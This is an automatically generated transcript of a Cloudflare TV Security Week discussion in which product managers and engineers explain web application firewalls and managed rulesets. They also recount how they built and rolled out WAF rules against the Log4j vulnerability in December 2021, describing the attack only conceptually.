π Security Week Discussion: Log4J
Presented by: Michael Tremante, Gabriel Gabor, Andre Bluehs
Originally aired on July 12, 2022 @ 12:00 PM - 12:30 PM EDT
Join Cloudflare's Product Management team to learn more about the products announced today during Security Week.
Read the blog posts:
- A bridge to Zero Trust
- Cloudflare partners with Microsoft to protect joint customers with a Global Zero Trust Network
- Introducing SSH command logging
- Zero Trust client sessions
- Managing Clouds - Cloudflare CASB and our not so secret plan for whatβs next
Tune in daily for more Security Week at Cloudflare!
SecurityWeek
English
Security Week
Transcript (Beta)
Hello everyone and welcome to Cloudflare TV. My name is Michael Thurmond.
I'm going to be your host today.
Really excited.
It's Friday today.
We're getting towards the end of security week.
Still a lot of great announcements.
But today the topic is going to be Log4j and specifically a very high severity vulnerability that happened back in December.
Log4j.
And also, we're going to talk a little bit about Web application firewall in general.
I'm a product manager, have been a Cloudflare. I work for quite, quite a few years.
I work on application security.
But the great guest today with me are, of course, Andrew and Gabriel.
Thank you very much for joining.
And before we dive in, I guess, Gabriel, a couple of words about yourself.
Hi.
Hello. So, I'm Gabriel. Gabriel Gabor.
I'm a software engineer in the materials team, which is the actual team managing all the related products.
Awesome.
And Andre, over to you. Hi there.
I'm Andre. Go. Okay.
I lead the WAF teams generally and so in charge of the team that was working on this.
So when we did the kind of prep for this, you asked me if I pronounce it log forge or Log4j.
I never heard of it Llog forge before.
It's always Log4j.
I don't know how to pronounce it, to be honest.
I was asking to see if you knew the actual.
The actual answer.
No, I don't.
Great.
So, yeah, Andre. Andre and I work very closely together on all things WAF related.
Great.
So before we actually jump in to the topic, a few housekeeping items for those of you who are listening.
Of course, if you do want to submit questions, please email live studio at Cloudflare dot TV.
If we do receive questions, we'll try to answer them towards the end of the session.
If for any reason we don't get to them. We'll definitely follow up.
And of course you can reach out any time to support team or if you're an enterprise customer, please reach out to your customer success manager and they will be able to put us in contact directly or answer the questions with your solutions engineer.
And with that, let's talk about WAF a little before we talk about Log4j.
Andre, I think you've been working with WAF for quite some time. For everyone who's listening.
What is a WAF at a high level? Sure.
Well, it stands for Web Application Firewall. And so that's a pretty accurate description.
And so what it does is it's its goal is to protect web applications or generally servers from various kinds of malicious attacks.
So things like SQL injection or cross-site scripting or this Log4j that we're going to log for each other.
We're going to talk about definitely not Log4j.
It's the worst combination of those two things.
And so the way that it kind of works here at Cloudflare is Cloudflare is a reverse proxy.
And so we are able to process requests as they before they get to Origin servers.
And we can really do our best to stop malicious requests before they get to Origin servers because our customers traffic is makes us stop at Cloudflare first and so on the web team, what we do is we build rules for our WAF.
And so earlier this week actually we talked about our machine learning that we announced earlier this week and that we have built and what we actually did was we took our rules based and we use that as a starting point to help us train and as kind of a benchmark of our HTML.
And those rules consist of various kinds of matching against patterns, whether that's in the request or bits about the request.
Does a particular header contain those kinds of things?
And matching on a lot of regex is in there.
And so that's that's really the goal of the laugh is to be able to protect our customers servers and protect as much as possible.
And so the on the on the managed rules team, we focus on a global laugh, which is that we provide rules that are general purpose.
So things for large, large kinds of attacks or a another common one is narrowing down the kinds of requests that you want to allow to your server.
Like, is it only a get or is it only a post kind of request?
Those kinds of things, general purpose rules for our customers.
Whereas we also have a team that focuses on the custom side of things.
So giving our users the ability to build arbitrarily complex and look for things that aren't necessarily applicable to other organizations or other teams or things like that, that's, that's the customer side.
But we're, we're focused on building things that have the highest impact.
And so that's quite a bit of a challenge because we have to make sure that not only is it applicable, but we really have to pay attention to false positives as well.
And making sure that when we're building rules and we'll talk about this in kind of when we talk about this log4j, about how that's a process and it's quite challenging.
Got it.
Yeah. And so just to recap, if I'm running a website and for example, I think the most common one is WordPress, I can essentially place my WordPress app behind Cloudflare and Cloudflare if I have access to the web.
Of course we'll make sure that people don't break into my site.
Is that a good summary?
And then actually to that point, Andrew, any other any other advantages of using Cloudflare as the WAF compared to for example, I know Apache has a Mod security module, right.
Which implements WAF type features. Why would I use Cloudflare versus something like Mod Security?
Sure.
So interestingly, we actually for a long time used the same thing. So our way back in the date originally written by our CTO, John Graham-Cumming, used Apache and used Mod Security to do those kinds of things.
And so really the advantage that we have is scale.
We are able to analyze different kinds of attacks and attack vectors and we're able to if, if we can detect a particular attack that's happening on a subset of a subset of Internet properties, then we can apply that globally.
And so the benefits of allowing us to help protect you from those kinds of things is that you get the protection that everyone else gets as well.
Yeah, that's a good point.
And the way I also like to think about it is ideally security should not come at the compromise of performance, which I think ties really well with the scale factor.
If you're if you're running your own WAF on your own hardware, be it software virtualized or separate box, you need to worry about scale.
If your site increases in traffic, you might reach the limit of the WAF before you would reach the limit of your app itself.
But we've we've Cloudflare that doesn't doesn't apply anymore.
Right.
And performance. Yes.
And you were talking about sorry to talk over you know, you were you were talking about putting it in front of WordPress.
And that's not the only thing we've protected from.
You can you can really put anything behind Cloudflare, whether it's your application server or your mail server or anything that talks through the Internet you can put behind Cloudflare and our WAF can protect you against those kinds of things.
And so we actually we have some specific rules that aren't just at web servers or even things like WordPress or applications or things like that.
We have some other kinds of protections.
We use signals from different kinds of places of like we partner with our bots team.
And so we, we have some rules in our WAF that are that our customers can turn on of is someone pretending to be a Google bot or a bot or something like that.
And so it's not even just a I have a WordPress or a ghost or our custom application behind us and we want to protect from all the kinds of things.
It's, it's a general purpose kind of the manager rules that we provide.
Yeah.
And actually to that, to that point you mentioned under the manage rule sets that we provide are part of the value of WAFs.
Right.
So we have rules, I think, covering most things. And Gabriel, you've worked a lot on the manage rules component of the WAF.
I'd like to think again that if you buy a WAF, that's the engine.
But then the actual rules themselves are what's stopping the bad stuff from hitting your origin.
Do you mind telling us a little bit about the managed rules offerings that come with Cloud for.
Sure.
Sure. So I think the managerial sets are really one of the best parts of all the clubs very well.
The fact that we put a lot of effort to always improve, improve them and to make sure that they're fast.
We're doing a lot of work behind the scenes to make sure it's all optimized.
So compared to kind of a WAF, which someone could deploy on their own, more security that will always lag behind.
So Cloudflare is always really up to date.
And I'm going to discuss about three rule sets which are part of the, the core of the one.
And the first one is the Cloudflare ruleset. And this is really where we spend a lot of time kind of this is where all the security analysts spend a lot of time just each waiting on rules and making sure that those attacks or those cases are really mitigated.
So more specific about the cloud's very manageable set, this is we have some really interesting kind of advanced SQL injection mitigations.
We spend a lot of time just researching and making sure that we block the vast majority of SQL injection attacks with with this ruleset.
We also spent some time just making sure that a lot of cross-site scripting attacks are covered.
And this is really also the place where we put a lot of the zero days, the vulnerabilities that appear.
So for example, the rogue for which we'll discuss with also the Microsoft Exchange Server vulnerability which appeared last year in the middle of the year.
So this is really where we just constantly on a more than a weekly basis.
We have new rules.
Other than this, we also offer kind of an OST manageable set.
So context OWASP is a foundation which is really focused on security and the offer is really great was Core Ruleset, which is really defending against OWASP top ten attacks.
And this really covers a really broad kind of range of attacks. So we definitely supportthis in the cluster, customers are able to enable it and then they can also set different levels of aggressiveness.
So basically they can go a bit more aggressive or not based on their use case, based on the apps that they use.
The word, I think you were hesitating to say was paranoia.
So in our UI, it's called paranoia level.
Yeah, yeah, that's true.
So yeah.
And other than that, we also have a new manageable set, which is the leaked credentials check ruleset.
This is really awesome.
I think it was announced last year and it really focuses on.
On all the cases where applications suffered stuffing Credential stuffing attacks.
So for all the kind of content management systems like Joomla or Drupal or Host or Magento, there are certain databases with leaked usernames and passwords.
So if there's if there's an user who wants really to make sure that their users are not compromised and they do not compromise by these leaked credentials, this ruleset is really a great fit.
Yeah.
These are just, just three of them. But yeah, we probably have some more in the future.
Yeah.
Yeah. And, and the customers need to choose between one or the other or can they deploy all three at the same time.
No, definitely.
The offer is really customizable so they can really go and enable any ruleset in whatever order they can set the priority.
They can even go deeper and select certain categories.
For example, if you have a WordPress website and you want to protect only against WordPress attacks, you can easily set only the WordPress rules to be more aggressive and to block more.
So it's really customizable.
And then you can also go in the OS and set certain paranoia scores and you can even add your kind of custom rules.
So it's really customizable.
Yeah, yeah.
No, that's awesome. And I think the credential one you mentioned is pretty exciting for me.
It's built on, you know, we announced last year security with our new our new WAF engine and we're starting to build and get the benefits out of it.
And that's definitely more in the advanced sort of feature set.
And we, I remember when we tested on our first customers, we detected some pretty interesting brute force attacks just by checking for access logins.
We've compromised credentials with that, though.
The topic for today, of course, is Log4j, log for shell vulnerability, depending on how you how you want to read it.
Before we jump in on what we did when it was discovered Slash announced in December.
Andrew, I think it might be best to talk about this. What was the vulnerability?
What did attackers sort of discover here?
Sure.
So a little bit of context about what is log per day. It's kind of what it says on the tin.
It's a logging library for Java, the Java programing language.
And it's it's a it's kind of a go to industry standard way of logging things with Java.
And so it's it's grown over time and it has become quite a large surface area of functionality.
And so in this particular attack.
What's the what the people who exposed this attack realized was that it is so powerful it can kind of execute arbitrary things.
And specifically in this particular case, what it did was it wanted to try and go and fetch things and then tried to execute them.
And so it's a consequence of this becoming such a mature library and having so many features that over time things just got added.
And it was kind of, the features kind of cross-pollinating and becoming so powerful that it could do a whole lot of things.
And people didn't realize that these these consequences existed.
And so the this attack was dangerous for a whole bunch of reasons, first and foremost, because it's so prevalent.
It was used in so many different kinds of applications and the kind of knock on effects of because it's so prevalent, it's used in very popular Java applications and those Java applications are used in more and more places.
And so it was a multiplying effect of this one library used by so many things was vulnerable.
Therefore, all of those things are vulnerable. And so that was that was kind of this the the context around what is log for Shell and generally what is Log4J.
And so in a nutshell, Log4J allows you to put some arbitrary kind of mark up into a logging string, say you want to drop in some information about what's what's going on in that particular line of code.
And one of the things that you could do was reach out and go fetch something and then execute it.
Got it.
So essentially an attacker would add find a way to add to your logs this string.
It's actually really easy to compromise once you think about it. Right.
Generate a request to a web server but has a special string in it. If it ends up in the logs and those logs get past you.
Chances are your compromised.
Yeah, exactly.
So it's a whole class of class of vulnerabilities called RC remote code execution.
And so it's, you know, it's a well known phenomenon. It's not it's not unheard of for these kinds of things to happen.
Yeah.
Whenever I hear remote code execution, that's immediately should be at the top of the list of severities because normally results in full server take over.
Right.
Yeah. So from memory, unfortunately, I guess, but maybe expected all of this happened at least for some of us just before the holidays.
As you know, security teams might be taking some time off then and then these sort of things happen.
Gabriel, I think you were vital in the efforts of us preparing our mitigations.
How did it all play out? Do you mind giving us a bit of the story of what happened in those first days?
Sure.
Sure. So I think the vulnerability really was introduced quite early on. So it was introduced in Log4j I think it was 2.0 a beta version and it continued until 2.1.14 and then it was really fixed in 2.1.16.
But the vulnerability became public on the ninth of December.
And really 9 minutes after the vulnerability became public, we started to see large volumes of attacks.
It was really, really, really incredible.
So I was on call that day and I got paged at five in the morning and I got online and I looked at the vulnerability and kind of saw or started to realize how much impact this thing could have.
It was really it looked really bad, but I wasn't really fully aware at that time in the morning on how bad this could be.
So initially it was really just one customer asking, do we protect against this?
We need we need protection for this. So given that it was before ours, so the London team was not really online, I couldn't really deploy a rule on my own.
So the initial step was really to start to see the real impact and the variations of this of this.
So we started to deploy rules just to make sure and to gather information about the attack, to see how it really looks like in the wild.
And at the same time, we started to advise the customers who started to ask about this, and we really just gave them ways to protect against this just immediately.
And then we knew that this is so, so important that we have to release a rule as soon as possible.
So at that point, I escalated and Andre came online and the rest of the team came online, and we really kind of started to look at the payloads and really just I think a few a few hours after we got we heard about the attack, we already deployed a rule.
And actually the release procedure for rule is, is quite important here because we are aware that a rule can have a significant impact on the customer client.
So on the customers.
So we really put a lot of effort to make sure that these rules do not have false positives.
And this is really one of the core things about the WAF and we basically deployed certain test rules just to see which one would catch the most and would the most attacks and would have kind of reduced false positives.
And we decided to release a very safe version of the rule, which we knew would then have to iterate on.
But the priority then was to really get a protection out there as soon as possible to cover most of the attacks, because I think very high percentage of the attacks were really basic ones, just using the Jambi keyword and the LDAP keyword.
So.
We basically built a rule which is really safe and we did an emergency release, but we knew that our job is not done yet and that we really have to continue.
And it was, I think at that point it was already midday and we were starting to realize the impact of this.
There were multiple groups inside the company focusing on protecting the whole network and all the clients at different levels, for example, logging that customers could then get.
So the effort was really compromised.
But in the off time, we then started to iterate on the rules.
So we already had some, some tests.
Rules are just looking for variations.
We started to discover that there are so many ways in which you can obfuscate this attack.
So we started to protect against that and to make sure that the false, false positive rate is low.
And then we just kept going.
And each rating, I think by the end of that day we already had a second version released and we already started to kind of contact customers who were impacted by this.
And then, yeah, the second day, I think we found some new variations.
And that was actually really important because the amount of traffic, the amount of attacks with the new variation was significant.
So we had to fix that again.
So we spent another day iterating and making sure that we capture as many attacks as possible.
And at some point we really discovered that four can be extremely dangerous in this case because there's a whole language and there are so many ways in which you can you can obfuscate that attack and just.
Make it go through that we started to think about creating some really aggressive rules which would catch all these attacks.
But we knew that we can really avoid false positives, false positives with them.
So. I think the rule is really 100517. So that's a rule which is really disabled by default but is extremely aggressive and catches anything.
And yeah, so we started to iterate again on that second day and we made sure that the.
Most of the attacks are covered and also that we have some new rules which users could turn on by themselves if they want even more protection.
And at that point we.
Yeah. No.
And I think that's that's a really good segway actually to what I was going to ask next.
Well, first all you mentioned, we were deploying new rules constantly.
All of this whilst there was actually an internal incident declared to make sure we were not affected.
But at some point, we made the decision to protect everyone.
And Andrew, I think you were part of that conversation.
How did that play out?
How did we realize we should deploy these rules to all zones?
Yeah.
And so we have a little bit of precedent for this. So we have previously and we didn't really talk about it much, honestly.
We were protecting all of our customers regardless of free or whatever plan you're on, protecting customers from things like shellshock or some small bits of WordPress.
Because both of those things are so popular. And so the call was made to do the same thing for Virginia because it had such a high impact and such a prevalent use case.
We wanted to give this to as many people as possible.
And so we Gabriels been talking about the different kind of versions of rules that we had.
And it was it was really tricky. And we had this problem with a bunch of different classes of rules that we build, for instance, SQL injection.
There's a trade off between detecting things that look like SQL, like a select statement or something like that, and things that are malicious.
And so we had a similar kind of problem here where we could detect things that kind of looked like this attack.
And honestly, a lot of things that just look like JSON, it kind of looked like this attack or we could be a little bit more safe and detect things that were definitely this attack.
And so we kind of have we kind of had different kinds of rules.
And so the decision was made to give the more conservative this is definitely an attack rules to our customers to all of our customers regardless of what plan or how much they were using Cloudflare.
Right.
And this and this. You know, I always I'm always impressed by the efforts we put here as a company towards that.
Those of you who are following security week may have noticed on Tuesday we announced what for everyone and it's efforts like these that sort of drive into our ability and wanting to protect any zone on cover if the vulnerability is high, impacting, wide impacting.
And we're in a position where we can help and do something about it.
We want to.
So that's something to look forward to.
To that point, last question.
We got to really a couple of minutes, one minute and a half left.
Gabriel, I think you're also helping with the with the cloud for free manage ruleset we announced which will include Log4j rules.
What are the things that we including their out of the box.
Sure.
So in the process, we really want to make sure that we cover these kind of zero day attacks, which everyone needs.
And as Andrew mentioned, there's also shellshock, which is a Unix bash shell vulnerability, which can lead at some point to arbitrary execution of any command.
So that's really dangerous. And it happened back in 2014.
And we've been.
We've been offering protections for this in the war for a while, but it's really essential that all the users need it.
So we're including that in the free ruleset.
And we also know, I mean, WordPress is used at a really large scale and there are certain attacks which are really constantly tried on every website.
And it's there.
There. They're quite kind of easy to see.
So we really we also include the protections for certain aspects.
And then we also have a lot of more advanced protections in the, in the actual WAF, which is the managed cloud, very manageable set.
But in the free one we protect, we give this basically basic layer of protection for WordPress and we're actually working on adding some more.
Which are probably announced later on.
Yeah, yeah.
No, absolutely. I think if something along the lines of Log4j comes along, we will make sure we'll add those rules to the cloud for free manage ruleset.
With that, of course, I really enjoyed this session.
Hopefully our viewers enjoyed it too.
Thank you very much, Andrew and Gabriel.
I think that what happened over last December was a really good experience, even from a broader cybersecurity perspective.
And for those of you listening live Studio Cloudflare TV for any questions and there's more to come with Security Week tomorrow.
So please check out our blog.
Stay tuned with that.
Thanks again and see you soon on cover TV.